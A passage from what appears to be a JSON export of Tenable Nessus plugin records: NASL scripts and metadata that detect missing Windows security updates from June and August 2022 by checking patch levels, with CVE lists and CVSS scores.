script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014752',\n '5014743'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014752, 5014743])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:25:59", "description": "The remote Windows host is missing security update 5016623. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016623: Windows 10 version 1809 / Windows Server 2019 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016623.NASL", "href": "https://www.tenable.com/plugins/nessus/163946", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163946);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\"\n );\n script_xref(name:\"MSKB\", value:\"5016623\");\n script_xref(name:\"MSFT\", value:\"MS22-5016623\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016623: Windows 10 version 1809 / Windows Server 2019 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016623. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016623\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016623'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016623])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:48", "description": "The remote Windows host is missing security update 5016629. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016629: Windows 11 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35804", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016629.NASL", "href": "https://www.tenable.com/plugins/nessus/163945", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163945);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\",\n \"CVE-2022-35804\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016629\");\n script_xref(name:\"MSFT\", value:\"MS22-5016629\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016629: Windows 11 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016629. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016629\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016629\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016629\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35804\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016629'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016629])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:48:36", "description": "The remote Windows host is missing security update 5014742. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014742: Windows 7 and Windows Server 2008 R2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30163", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014742.NASL", "href": "https://www.tenable.com/plugins/nessus/162191", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162191);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30163\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014742\");\n script_xref(name:\"MSKB\", value:\"5014748\");\n script_xref(name:\"MSFT\", value:\"MS22-5014742\");\n script_xref(name:\"MSFT\", value:\"MS22-5014748\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014742: Windows 7 and Windows Server 2008 R2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014742. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014742\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014748\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014742 or Cumulative Update 5014748\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014748',\n '5014742'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014748, 5014742])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:27:19", "description": "The remote Windows host is missing security update 5016616. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016616: Windows 10 Version 20H2 / 21H1 / 